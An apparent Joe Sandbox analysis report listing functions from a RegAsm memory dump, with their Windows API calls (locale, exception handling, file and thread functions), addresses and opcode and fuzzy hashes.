Opcode ID: 87ef763bbd003f1d2de960a3db6ca709dde3cd444b7d1b6f895e6fd8deb0075d
Instruction ID: c043dc6610800097a8c7d9f7805d75e01504a092e95ab29a96a2aa982ce353c5
Opcode Fuzzy Hash: 87ef763bbd003f1d2de960a3db6ca709dde3cd444b7d1b6f895e6fd8deb0075d
Instruction Fuzzy Hash: FCA14732A041559FCF19DF28EC91BAE3BA1AB46314F18016EF801EB3D2C7398957D759

Function 00411432 Relevance: 4.5, APIs: 3, Instructions: 15
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32(?,?,0041142C,00000016,0040BD98,?,?,DE622082,0040BD98,?), ref: 00411443
TerminateProcess.KERNEL32(00000000,?,0041142C,00000016,0040BD98,?,?,DE622082,0040BD98,?), ref: 0041144A
ExitProcess.KERNEL32 ref: 0041145C

Memory Dump Source

Source File: 00000005.00000002.375892579827.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: fdc9db31659cbe28c415a8b0888f718e5b65b0592ff8268f2e9698ce38014a47
Instruction ID: 3fe6f93935658f8ab67006e652a10cd0383134051074610e396dae59c432ecd7
Opcode Fuzzy Hash: fdc9db31659cbe28c415a8b0888f718e5b65b0592ff8268f2e9698ce38014a47
Instruction Fuzzy Hash: 5DD09E31100148ABCF117F61EC0DA993F2AAF407557858025FA0A56131CB369993AA58

Function 00416DAF Relevance: 3.2, APIs: 2, Instructions: 191
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 004164C2: GetConsoleOutputCP.KERNEL32(DE622082,00000000,00000000,0040BDB8), ref: 00416525

WriteFile.KERNELBASE(FFBF5BE8,00000000,?,0040BC75,00000000,00000000,00000000,00000000,?,?,0040BC75,?,?,004328B8,00000010,0040BDB8), ref: 00416F18
GetLastError.KERNEL32(?,0040BC75,?,?,004328B8,00000010,0040BDB8,?,?,00000000,?), ref: 00416F22

Memory Dump Source

Source File: 00000005.00000002.375892579827.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID: ConsoleErrorFileLastOutputWrite
String ID:
API String ID: 2915228174-0
Opcode ID: f464ed671a76038d08897ffb1fb948258ea98ac2c0acb72c9529f46f39d22c7a
Instruction ID: cb585fdb2482b244a4d3bef91fab55670e651a1c55327e645a67e42ff2a15e13
Opcode Fuzzy Hash: f464ed671a76038d08897ffb1fb948258ea98ac2c0acb72c9529f46f39d22c7a
Instruction Fuzzy Hash: 4461D775D04249AFDF10CFA8C844AEF7FB9AF09308F16415AF804A7252D379D986CB69

Function 00414A96 Relevance: 3.1, APIs: 2, Instructions: 65
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetStdHandle.KERNEL32(000000F6), ref: 00414AE2
GetFileType.KERNELBASE(00000000), ref: 00414AF4

Memory Dump Source

Source File: 00000005.00000002.375892579827.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID: FileHandleType
String ID:
API String ID: 3000768030-0
Opcode ID: 14da27bdb5d952759cc947a18c1f6313485b17a09da5127208cbfccaf6a1781a
Instruction ID: 68df3f11dd2f645efc31e1e90aadc3e75d180b75955679e0b2236dab09e8ba97
Opcode Fuzzy Hash: 14da27bdb5d952759cc947a18c1f6313485b17a09da5127208cbfccaf6a1781a
Instruction Fuzzy Hash: 141175712087514AC7308E3E9C887637AD4ABD6370B39071BD1B6962F1C328E9C6965D

Function 00403EE0 Relevance: 3.0, APIs: 2, Instructions: 22
synchronizationthreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateThread.KERNELBASE(00000000,00000000,004038C0,00000000,00000000,DE622082), ref: 00403F06
WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00403F0F

Memory Dump Source

Source File: 00000005.00000002.375892579827.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID: CreateObjectSingleThreadWait
String ID:
API String ID: 1891408510-0
Opcode ID: af3e1afe4429c917983b20489d93451d494df3de1508f1cbbf6b72916d2180c4
Instruction ID: 9ada69c4f7ca39928594594d106047c4e65b58e1a3541a0c5f1fc3d2bb6a9bfa
Opcode Fuzzy Hash: af3e1afe4429c917983b20489d93451d494df3de1508f1cbbf6b72916d2180c4
Instruction Fuzzy Hash: 10E08675758300BBD710EF24EC07F1A3BE4BB48B05F914A39F295A62D0D674B404965E

Function 00414D5D Relevance: 2.6, APIs: 2, Instructions: 63
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CloseHandle.KERNELBASE(00000000,00000000,CF830579,?,00414C44,00000000,CF830579,00432C48,0000000C,00414D00,0040BD0B,?), ref: 00414DB3
GetLastError.KERNEL32(?,00414C44,00000000,CF830579,00432C48,0000000C,00414D00,0040BD0B,?), ref: 00414DBD

Memory Dump Source

Source File: 00000005.00000002.375892579827.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID: CloseErrorHandleLast
String ID:
API String ID: 918212764-0
Opcode ID: cf05b64a0bbd980239ba65db1c1c6f103e722fbee84b5f4660c8636332b429dd
Instruction ID: ceb111eb948f9657ebdeceefd9bfba8073a9b29251fc9eed98a790ab6a2c0bec
Opcode Fuzzy Hash: cf05b64a0bbd980239ba65db1c1c6f103e722fbee84b5f4660c8636332b429dd
Instruction Fuzzy Hash: 06114C336041241ADB246635BC867FE6749CBC1738F290A5FF808C72C1DE388CC2929C

Function 004143CC Relevance: 1.6, APIs: 1, Instructions: 57
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000005.00000002.375892579827.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 672b8ef80a1082ffe797a66fe554d50d659c07feffc08aafbed84bfcd02d8428
Instruction ID: d7b25293e7db54f96000769fea1aeb7630fb582f3d7d0c2fc2c622193e8995c8
Opcode Fuzzy Hash: 672b8ef80a1082ffe797a66fe554d50d659c07feffc08aafbed84bfcd02d8428
Instruction Fuzzy Hash: 620128373002255F9F25CF6EEC40ADB33A6FBC07243148136FA20CB684DA34D8829799

Function 00414094 Relevance: 1.5, APIs: 1, Instructions: 39
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(00000008,0000000C,?,?,004152D9,00000001,00000364,?,00000006,000000FF,?,?,0040E077,00415469), ref: 004140D5

Memory Dump Source

Source File: 00000005.00000002.375892579827.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 14b8f9ac75b8980b6812ff089cde42dce8ba1f12a125e940596199f5ca44a4d3
Instruction ID: 7a371578952800d697783e4f14dfa84f7cfeb60b6085e341501622e7ba028638
Opcode Fuzzy Hash: 14b8f9ac75b8980b6812ff089cde42dce8ba1f12a125e940596199f5ca44a4d3
Instruction Fuzzy Hash: E9F0BB35605625ABDB215A63DC05BDB3F489FC5760B158123B904EB1A0CA68D9D1819D

Function 0041FB65 Relevance: 1.5, APIs: 1, Instructions: 15
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE(?,00000000,?,0041FF58,?,?,00000000,?,0041FF58,?,0000000C), ref: 0041FB82

Memory Dump Source

Source File: 00000005.00000002.375892579827.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 32f1cee3c5876f16e38c750b1e34007635eee82df29fa4d42b06ff8a7cf34f14
Instruction ID: 28cfbda6749b70c9de2fbd9d245fef773b8951bf2dd70127050a9a6bf190398c
Opcode Fuzzy Hash: 32f1cee3c5876f16e38c750b1e34007635eee82df29fa4d42b06ff8a7cf34f14
Instruction Fuzzy Hash: 05D06C3210010DFBDF128F84DC06EDA3FAAFB4C714F018010FA5856021C732E832AB94

Non-executed Functions

Function 0041EBA1 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 85COMMON

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(3FC00000,2000000B,0041EEBF,00000002,00000000,?,?,?,0041EEBF,?,00000000), ref: 0041EC3A
GetLocaleInfoW.KERNEL32(3FC00000,20001004,0041EEBF,00000002,00000000,?,?,?,0041EEBF,?,00000000), ref: 0041EC63
GetACP.KERNEL32(?,?,0041EEBF,?,00000000), ref: 0041EC78

Strings

ACP, xrefs: 0041EBBF
OCP, xrefs: 0041EBF5

Memory Dump Source

Source File: 00000005.00000002.375892579827.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID: InfoLocale
String ID: ACP$OCP
API String ID: 2299586839-711371036
Opcode ID: ae0517b9bda7198648f1cbed6e652a34a4e79f3510d6da964a24c0c18db862fc
Instruction ID: 81a9d30784dd22d719d41cfb92251f6e816e7a4bc62bdb22216d11a6fc444572
Opcode Fuzzy Hash: ae0517b9bda7198648f1cbed6e652a34a4e79f3510d6da964a24c0c18db862fc
Instruction Fuzzy Hash: 92218E3AB04101AADB34CF56CD05AD773A7AF50B50B568826FD0AD7211F736EE81C798

Function 0041ED76 Relevance: 7.7, APIs: 5, Instructions: 183COMMON

Download Yara Rule

APIs

Part of subcall function 0041513B: GetLastError.KERNEL32(?,00000008,004176BA), ref: 0041513F
Part of subcall function 0041513B: SetLastError.KERNEL32(00000000,00000001,00000006,000000FF), ref: 004151E1

GetUserDefaultLCID.KERNEL32(?,?,?,00000055,?), ref: 0041EE82
IsValidCodePage.KERNEL32(00000000), ref: 0041EECB
IsValidLocale.KERNEL32(?,00000001), ref: 0041EEDA
GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 0041EF22
GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 0041EF41

Memory Dump Source

Source File: 00000005.00000002.375892579827.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser
String ID:
API String ID: 415426439-0
Opcode ID: 1f142972335a53d1e2416df24534188105d76140515381cc06687f0020485920
Instruction ID: eeabbf5cfaddba79e94d22b4dd48aaeada7d5b667952b3c456454f902e5df75d
Opcode Fuzzy Hash: 1f142972335a53d1e2416df24534188105d76140515381cc06687f0020485920
Instruction Fuzzy Hash: B4519075A00315ABDF20DFA6DC41BEB77B8FF48700F54442AAD14E7290E7789980CB69

Function 0041E412 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 251COMMON

Download Yara Rule

APIs

Part of subcall function 0041513B: GetLastError.KERNEL32(?,00000008,004176BA), ref: 0041513F
Part of subcall function 0041513B: SetLastError.KERNEL32(00000000,00000001,00000006,000000FF), ref: 004151E1

GetACP.KERNEL32(?,?,?,?,?,?,00411EE1,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 0041E4D3
IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,00411EE1,?,?,?,00000055,?,-00000050,?,?), ref: 0041E4FE
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 0041E661

Strings

utf8, xrefs: 0041E5D0

Memory Dump Source

Source File: 00000005.00000002.375892579827.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID: ErrorLast$CodeInfoLocalePageValid
String ID: utf8
API String ID: 607553120-905460609
Opcode ID: d2e92ad91d33230e432f41824a885b4f53a9106f8c4d9673b702c20c8aa694f9
Instruction ID: 5e8f11e88951c7c1c9557d61489bca48d24d80555c5ca4e9e4b82e7d51b65768
Opcode Fuzzy Hash: d2e92ad91d33230e432f41824a885b4f53a9106f8c4d9673b702c20c8aa694f9
Instruction Fuzzy Hash: 8F711775A00611AADB24AB77CC42BE773A8EF54708F14442BFD05D7281FB7CE9818799

Function 00407B01 Relevance: 6.1, APIs: 4, Instructions: 73COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00407B0D
IsDebuggerPresent.KERNEL32 ref: 00407BD9
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00407BF9
UnhandledExceptionFilter.KERNEL32(?), ref: 00407C03

Memory Dump Source

Source File: 00000005.00000002.375892579827.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
String ID:
API String ID: 254469556-0
Opcode ID: bdb8d4ffe5861b74027a400539b36d4e8f115b4355d90c864d7f04757154f5f6
Instruction ID: ca20a48664bdef0e78e9b146848890f6e34f40b99dedcfcf476291c653997e40
Opcode Fuzzy Hash: bdb8d4ffe5861b74027a400539b36d4e8f115b4355d90c864d7f04757154f5f6
Instruction Fuzzy Hash: 1B314B75D0521CDBDF20DFA0D9497CDBBB8BF04304F1040AAE50DA7290EB756A859F09

Function 004079F4 Relevance: 6.0, APIs: 4, Instructions: 25timethreadCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 00407A06
GetCurrentThreadId.KERNEL32 ref: 00407A15
GetCurrentProcessId.KERNEL32 ref: 00407A1E
QueryPerformanceCounter.KERNEL32(?), ref: 00407A2B

Memory Dump Source

Source File: 00000005.00000002.375892579827.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
String ID:
API String ID: 2933794660-0
Opcode ID: 59474b093c2734ed65025d9312c7830e2926c29405c8c4fc18f97dd435a31864
Instruction ID: d7a6b8423975b11b60f081a4b678c5b3c531ddc08062118d689bb25815d402f5
Opcode Fuzzy Hash: 59474b093c2734ed65025d9312c7830e2926c29405c8c4fc18f97dd435a31864
Instruction Fuzzy Hash: 1AF05F71D10209EBCB10DBB4D949A9EBBF8FF18305F9284A5D412E7150D738AB05AF55

Function 00407D75 Relevance: 6.0, APIs: 4, Instructions: 12COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(00000000,?,00407E95,@SC), ref: 00407D7A
UnhandledExceptionFilter.KERNEL32(00407E95,?,00407E95,@SC), ref: 00407D83
GetCurrentProcess.KERNEL32(C0000409,?,00407E95,@SC), ref: 00407D8E
TerminateProcess.KERNEL32(00000000,?,00407E95,@SC), ref: 00407D95

Memory Dump Source

Source File: 00000005.00000002.375892579827.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentTerminate
String ID:
API String ID: 3231755760-0
Opcode ID: 90e0c28526d8e2670e45d378d3030b1b85810cbff8aa27038c8ce2f85a3f89aa
Instruction ID: 01891b0a4bf0db97f441f4bd913211032710d453597561553d6f7347da66ed2e
Opcode Fuzzy Hash: 90e0c28526d8e2670e45d378d3030b1b85810cbff8aa27038c8ce2f85a3f89aa
Instruction Fuzzy Hash: C7D01271244208EBC7106BE0FD0CF083F28FB04202F864020F30A91020CB324403AB69

Function 0041E825 Relevance: 4.7, APIs: 3, Instructions: 205COMMON

Download Yara Rule

APIs

Part of subcall function 0041513B: GetLastError.KERNEL32(?,00000008,004176BA), ref: 0041513F
Part of subcall function 0041513B: SetLastError.KERNEL32(00000000,00000001,00000006,000000FF), ref: 004151E1

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0041E879
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0041E8C3
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0041E989

Memory Dump Source

Source File: 00000005.00000002.375892579827.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID: InfoLocale$ErrorLast
String ID:
API String ID: 661929714-0
Opcode ID: dd539c89c5381dfdaac91928ad5ed676a1006981e28db1904c6f4bbe4cde2b34
Instruction ID: efc99f0a6d6f1c6c35933ec1b38cf6b3cd41524c9fcadcabef19194d257b4763
Opcode Fuzzy Hash: dd539c89c5381dfdaac91928ad5ed676a1006981e28db1904c6f4bbe4cde2b34
Instruction Fuzzy Hash: EB618CB59101079BDB689F26CD82BEA77A8FF04340F14417BED16C6281F738D981DB58

Function 0040DD78 Relevance: 4.6, APIs: 3, Instructions: 77COMMON

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000001), ref: 0040DE70
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000001), ref: 0040DE7A
UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000001), ref: 0040DE87

Memory Dump Source

Source File: 00000005.00000002.375892579827.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: b5dd4f76152aea6ca03237fb28cccd4ebdc33645a90cdebeab5d7b36533c9830
Instruction ID: 2886232a598c6d0739cb6745ed5e05dca1263a9451a5c599d013a0f88592b0f0
Opcode Fuzzy Hash: b5dd4f76152aea6ca03237fb28cccd4ebdc33645a90cdebeab5d7b36533c9830
Instruction Fuzzy Hash: 4131E574D012189BCB21DF69D98878DBBB8BF08310F5041EAE41CA7291E774AF858F48

Function 004077E0 Relevance: 1.6, APIs: 1, Instructions: 147COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 004077F6

Memory Dump Source

Source File: 00000005.00000002.375892579827.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID: FeaturePresentProcessor
String ID:
API String ID: 2325560087-0
Opcode ID: 96a2ba3aa580dc615e5e38e6a61e3a4296c942238419a14d8ec0a8789d2e52c4
Instruction ID: 853601205c21894bcdc8f75123652b739dccbac0e00907a06a8c71bf04373a9d
Opcode Fuzzy Hash: 96a2ba3aa580dc615e5e38e6a61e3a4296c942238419a14d8ec0a8789d2e52c4
Instruction Fuzzy Hash: 865180B2E056059FEB18CF54E9857AEBBF0FB48350F14913AD501EB390D378A940CB59

Function 0041B6EA Relevance: 1.6, APIs: 1, Instructions: 140COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.375892579827.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b7a92f0add20f5243049fdc0791b09eb08ff10391a85524ccbb003bb3367a1d5
Instruction ID: e26fa8b462e3a3bc0dcd1cb195ad12d8a73a1b261898cc61817e46cff9ff25aa
Opcode Fuzzy Hash: b7a92f0add20f5243049fdc0791b09eb08ff10391a85524ccbb003bb3367a1d5
Instruction Fuzzy Hash: 9841A3B5804219AEDB20DF69CC89AEEBBB9EF45304F1441EEE418D3201DB359E858F54

Function 0041EA78 Relevance: 1.6, APIs: 1, Instructions: 83COMMON

Download Yara Rule

APIs

Part of subcall function 0041513B: GetLastError.KERNEL32(?,00000008,004176BA), ref: 0041513F
Part of subcall function 0041513B: SetLastError.KERNEL32(00000000,00000001,00000006,000000FF), ref: 004151E1

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0041EACC

Memory Dump Source

Source File: 00000005.00000002.375892579827.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID: ErrorLast$InfoLocale
String ID:
API String ID: 3736152602-0
Opcode ID: 22a4290edeb40b255e0ef88b49f21dfdd78c731e0f866b45595c0c5f80cee5a7
Instruction ID: 09566a44d01ac47d2cdad9f49e07ec0328cace9eeb3adbfa8c3b07b4827ecd72
Opcode Fuzzy Hash: 22a4290edeb40b255e0ef88b49f21dfdd78c731e0f866b45595c0c5f80cee5a7
Instruction Fuzzy Hash: D321AF36605206ABDB28DE26DD42AFB73A8EF44314B10407FED02D6241EB78AD81CB58

Function 0041E6FF Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

Part of subcall function 0041513B: GetLastError.KERNEL32(?,00000008,004176BA), ref: 0041513F
Part of subcall function 0041513B: SetLastError.KERNEL32(00000000,00000001,00000006,000000FF), ref: 004151E1

EnumSystemLocalesW.KERNEL32(0041E825,00000001,00000000,?,-00000050,?,0041EE56,00000000,?,?,?,00000055,?), ref: 0041E771

Memory Dump Source

Source File: 00000005.00000002.375892579827.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID: ErrorLast$EnumLocalesSystem
String ID:
API String ID: 2417226690-0
Opcode ID: 9637497d46bd12567f8eabdc0472934baf484039a92a8dbd1bfa50b3c5102b1b
Instruction ID: f28f85ac1fea5866725ce88a4d547c14bcace0560233e7335010750b785556cb
Opcode Fuzzy Hash: 9637497d46bd12567f8eabdc0472934baf484039a92a8dbd1bfa50b3c5102b1b
Instruction Fuzzy Hash: F0112C3A6007019FEB189F3AD8916FAB791FF80368B14442ED95747740E7757843C744

Function 0041ECA7 Relevance: 1.5, APIs: 1, Instructions: 45COMMON

Download Yara Rule

APIs

Part of subcall function 0041513B: GetLastError.KERNEL32(?,00000008,004176BA), ref: 0041513F
Part of subcall function 0041513B: SetLastError.KERNEL32(00000000,00000001,00000006,000000FF), ref: 004151E1

GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,0041EB22,00000000,00000000,?), ref: 0041ECD3

Memory Dump Source

Source File: 00000005.00000002.375892579827.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID: ErrorLast$InfoLocale
String ID:
API String ID: 3736152602-0
Opcode ID: f78a423274370276909a02de998c8e2fb19ace7283c045400ea6aabaf7fbf6a9
Instruction ID: 6e93bce3e8a9596dc076f6a872b53f7d727095e2315f943068ff1bd0afa52940
Opcode Fuzzy Hash: f78a423274370276909a02de998c8e2fb19ace7283c045400ea6aabaf7fbf6a9
Instruction Fuzzy Hash: 56F02D3A600113BFDB245B26EC09BFB7764EB40354F19442AEC06A3280EA78FDC2C694

Function 0041E60D Relevance: 1.5, APIs: 1, Instructions: 43COMMON

Download Yara Rule

APIs

Part of subcall function 0041513B: GetLastError.KERNEL32(?,00000008,004176BA), ref: 0041513F
Part of subcall function 0041513B: SetLastError.KERNEL32(00000000,00000001,00000006,000000FF), ref: 004151E1

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 0041E661

Strings

utf8, xrefs: 0041E5D0

Memory Dump Source

Source File: 00000005.00000002.375892579827.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID: ErrorLast$InfoLocale
String ID: utf8
API String ID: 3736152602-905460609
Opcode ID: 2152daac5f42ae25a129a23ac8d896ce75da55d7df13b3f6dfbcda70826a3db5
Instruction ID: d369d087f973f2c2e7390e19339e1b86590d8fa7fa541369cb1b30fd3d4077c9
Opcode Fuzzy Hash: 2152daac5f42ae25a129a23ac8d896ce75da55d7df13b3f6dfbcda70826a3db5
Instruction Fuzzy Hash: B0F0F436A10105ABC714AF25DC45FFA73A8EB84324F40007EAA02D7281EA78AD418758

Function 0041E79A Relevance: 1.5, APIs: 1, Instructions: 41COMMON

Download Yara Rule

APIs

Part of subcall function 0041513B: GetLastError.KERNEL32(?,00000008,004176BA), ref: 0041513F
Part of subcall function 0041513B: SetLastError.KERNEL32(00000000,00000001,00000006,000000FF), ref: 004151E1

EnumSystemLocalesW.KERNEL32(0041EA78,00000001,45F1B473,?,-00000050,?,0041EE1A,-00000050,?,?,?,00000055,?,-00000050,?,?), ref: 0041E7E4

Memory Dump Source

Source File: 00000005.00000002.375892579827.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID: ErrorLast$EnumLocalesSystem
String ID:
API String ID: 2417226690-0
Opcode ID: 7822a5e4b117a09642d2d9f73cbe77476052005b15321de9f48d0f235ef5c92f
Instruction ID: 0c0c1f316863ef4a6d30beb722119c93d5a9d1266b3f20af8045389666d513f6
Opcode Fuzzy Hash: 7822a5e4b117a09642d2d9f73cbe77476052005b15321de9f48d0f235ef5c92f
Instruction Fuzzy Hash: BDF0C23A2003045FEB249F3A9881ABABB95FF80368F15442EFD568B690D6759C82C718

Function 00414138 Relevance: 1.5, APIs: 1, Instructions: 33COMMON

Download Yara Rule

APIs

Part of subcall function 0040E0C6: EnterCriticalSection.KERNEL32(?,?,00412EDC,00000000,00432B68,0000000C,00412EA3,0000000C,?,004140C7,0000000C,?,004152D9,00000001,00000364,?), ref: 0040E0D5

EnumSystemLocalesW.KERNEL32(0041412B,00000001,00432BE8,0000000C,0041455A,00000000), ref: 00414170

Memory Dump Source

Source File: 00000005.00000002.375892579827.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID: CriticalEnterEnumLocalesSectionSystem
String ID:
API String ID: 1272433827-0
Opcode ID: 80f246e533dc21f73d9613eff5259b5841ca6d0f841dd3ce2907f16627d73c59
Instruction ID: 198ab3507c4040aae18c9164df511e00e81c972c753b4360ebc7eca8a0771405
Opcode Fuzzy Hash: 80f246e533dc21f73d9613eff5259b5841ca6d0f841dd3ce2907f16627d73c59
Instruction Fuzzy Hash: 14F03C72A14204DFD710EF99E842B9C77B0FB84725F10422BE811DB2A0C7B959409B98

Function 0041E6B4 Relevance: 1.5, APIs: 1, Instructions: 31COMMON

Download Yara Rule

APIs

Part of subcall function 0041513B: GetLastError.KERNEL32(?,00000008,004176BA), ref: 0041513F
Part of subcall function 0041513B: SetLastError.KERNEL32(00000000,00000001,00000006,000000FF), ref: 004151E1

EnumSystemLocalesW.KERNEL32(0041E60D,00000001,45F1B473,?,?,0041EE78,-00000050,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 0041E6EB

Memory Dump Source

Source File: 00000005.00000002.375892579827.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID: ErrorLast$EnumLocalesSystem
String ID:
API String ID: 2417226690-0
Opcode ID: 8c2aaa4c0cd0d54cc735e91a7a0ddb58f51471a544283acf310fccb30414098b
Instruction ID: d7e3b5c502124c080ac9a43a58f0728b4bb26e435a168ea3e401fe3e83efba30
Opcode Fuzzy Hash: 8c2aaa4c0cd0d54cc735e91a7a0ddb58f51471a544283acf310fccb30414098b
Instruction Fuzzy Hash: A9F0E53A30025597CB149F3AD8557AABF94EFD1724F87405AEE06CB250C6799883C758

Function 0041465E Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(00000000,?,00000000,?,-00000050,?,?,?,00412A47,?,20001004,00000000,00000002,?,?,00412049), ref: 00414692

Memory Dump Source

Source File: 00000005.00000002.375892579827.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

